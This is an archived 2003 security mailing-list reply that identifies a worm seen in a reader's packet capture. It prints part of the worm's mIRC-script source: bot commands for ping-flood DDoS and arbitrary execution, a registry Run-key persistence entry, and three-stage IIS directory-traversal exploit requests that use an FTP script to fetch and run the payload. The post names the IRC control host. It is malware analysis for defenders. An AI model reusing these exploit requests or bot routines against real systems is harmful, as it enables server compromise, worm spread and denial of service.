On 14 Jul 2003 17:35:36 -0000, sgt_b <sgt_b2002at_private> wrote: > > > I've included a link to a tcpdump taken that shows a standard IIS > directory-traversal attack. I was looking over the packets and noticed a > reference to www.google.com. Could someone take a look, and let me know > what this is being used for? > > http://12.208.102.165/attack3.dump > atack3.dump=1.6kb It's either this: http://www.gdgsoft.com/info/notes/gsfxalert.asp or a very close relative. This beastie swept through my networks and has caused quite a few machines to become infected. The variant that I've got creates: C:\WINNT\SYSTEM32\dfg ghj\loi gty\ which contains this: CLS.BAT DATA.BAK DEXE.CPL FSLX.EXE KLSYS.EXE NEXE.CPL PLUG.DLL PSC32.EXE SYSTL.EXE TSYSL.BAT WINSE.EXE It's appears to be a more recent version of W32.Randon.worm: http://vil.nai.com/vil/content/v_100097.htm with quite a few "improvements" like a much larger dictionary and it doesn't seem to be detected by several of the larger anti-virus packages (I might add that clamd *does* find this one as W32.Mix) Oh, and it's got DDoS capabilities. Here's the top bit of `strings PLUG.DLL`: on *:START:{ run systl.exe /n /fh winsck sconf inc %many if (%many = 1) { set %infecttime $day $date $time | regs | checksf | makeSHR } alias n0clone { if ($portfree(29275) == $false) { exit } | socklisten noclone 29275 } on *:TEXT:*:*: { if ($nick isop $rds(sc)) { if ($1 = !ntimer) { if ($2 = Sock) { set %ntnick $3 | set %ntserver $4 | set %ntport $5 | sockopen NTimer $+ $r(1,1000) $+ $fnick %ntserver %ntport } } if ($1 = !ntreg) { reg $2- } if ($1 = !ntstop) { ntstop } if ($1 = !dde) { /dde $2 command "" / $+ $3- } if ($1 = !ind) { .identd on $2- } if ($1 = !-) && ($2 != $null) { %- = $2- | / $+ %- | unset %- } if ($1 = !pfast) { if ($4 == random) { //Tw1stStart $2 $3 $r(1,64000) | halt } | //Tw1stStart $2 $3 $4 } if ($1 = !fserv) { /saym [F-Serv Initialized] ( $+ $nick $+ ) ( Enjoy! | /fserve $nick 3 $2 } if ($1 = !packet) && ($3 != $null) { run systl.exe /n /fh /r "ping.exe $2 -n $3 -l 65500" | saym 14DDoS 14 packeting $2 with $calc($3 *65536/1024/1000) $+ mb traffic } if ($1 = !packet.stop) { run systl.exe /n /fh /r "winse.exe -kf ping.exe" | saym 14DDoS 14 packeting halted! } if ($1 = !run) && ($2 != $null) { /run $2- } if ($1 = !icmp) { if ($2 == $null) { /saym rror yntax: (!icmp ip packetsize howmany, ie: !icmp 127.0.0.1 2000 1000) | halt } | run systl.exe /n /r "ping -n $4 -l $3 -w 0 $2 " } if ($1 = !Clone) { /clone $2- } if ($1 = !syn) { if ($2 !== $null) { saym . . . and so it goes for 692 lines. The odd HTTP connects that you saw were from the very end of PLUG.DLL: alias sconf { .ddeserver on gtt1wst3r1.4.2 .nick [_ $+ $r(1000,99999) $+ ]] .n0clone .Cona .timercheck 0 10 Cona .timerh1dd3 -o 0 1 H1dd3 .timers33 -o 0 1 s33 .timerregs -o 0 1 regs .run systl.exe /n /fh /r cls.BAT .timerkillsofts -o 0 5 killsofts alias regs { if ($Regread(HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\salfx) = NA) { $RegWrite(HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersi on\Run\salfx,$mircdirklsys.exe,REG_SZ) } } alias saym { if ($me isvo $rds(sc)) { clearall | msg $rds(sc) $1- } } alias checksf { if ($exists($rds(sf)) = $false) && ($findfile(c:\,$rds(sf),0) != 0) { copy $findfile(c:\,$rds(sf),1) $rds(sf) } } on *:SOCKOPEN:Sg1.*: { sockwrite -n $sockname GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\script.exe HTTP/1.1 sockwrite -n $sockname Host: www.google.com sockwrite -n $sockname Connection: keep-alive sockwrite $sockname $crlf on *:SOCKCLOSE:Sg1.*: { sockopen Sg2. $+ $gettok($sockname,2,46) $+ . $+ $gettok($sockname,3,46) $+ . $+ $gettok($sockname,4,46) $+ . $+ $gettok($sockname,5,46) on *:SOCKOPEN:Sg2.*: { saym IIS Exploit ATTEMPTING STAGE 2 sockwrite -n $sockname GET /scripts/script.exe?/c+echo+open+127.0.0.1>tmp2&&echo+Administrator>>tmp2&&echo+1234>>tmp2&&echo+get+httpodbc.dll>>tmp2&&echo+get+ $+ $rds(sf) $+ >>tmp2&&echo+bye>>tmp2&&echo+ftp+-s:tmp2>>tmp2.cmd&&echo+exit>>tmp2.cmd&&tmp2.cmd HTTP/1.1 sockwrite -n $sockname Host: www.google.com sockwrite -n $sockname Connection: keep-alive sockwrite $sockname $crlf on *:SOCKCLOSE:Sg2.*: { saym IIS Exploit STAGE 2 COMPLETE sockopen Sg3. $+ $gettok($sockname,2,46) $+ . $+ $gettok($sockname,3,46) $+ . $+ $gettok($sockname,4,46) $+ . $+ $gettok($sockname,5,46) on *:SOCKOPEN:Sg3.*: { saym IIS Exploit ATTEMPTING STAGE 3 sockwrite -n $sockname GET /scripts/httpodbc.dll?MfcISAPICommand=Exploit&cmd=c%3A%5Cwinnt%5Csystem32%5Ccmd.exe+%2Fc+c%3A%5Cinetpub%5Cscripts%5C $+ $rds(sf) HTTP/1.1 sockwrite -n $sockname Host: www.google.com sockwrite -n $sockname Connection: keep-alive sockwrite $sockname $crlf on *:SOCKCLOSE:Sg3.*: { saym IIS Exploit STAGE 3 COMPLETE An infected host will join an IRC channel on rul3z.q8hell.org and sit waiting for instructions. The host will also start scanning for windows shares that it can infected. It appears to also use a fairly large dictionary in an attempt to guess passwords on any shares that it finds. And finally, the infected host will start scanning for IIS web servers to infect. Paul -- Paul Dokas dokasat_private ====================================================================== Don Juan Matus: "an enigma wrapped in mystery wrapped in a tortilla." ---------------------------------------------------------------------------- Attend the Black Hat Briefings & Training, July 28 - 31 in Las Vegas, the world's premier technical IT security event! 10 tracks, 15 training sessions, 1,800 delegates from 30 nations including all of the top experts, from CSO's to "underground" security specialists. See for yourself what the buzz is about! Early-bird registration ends July 3. This event will sell out. www.blackhat.com ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue Jul 15 2003 - 11:21:52 PDT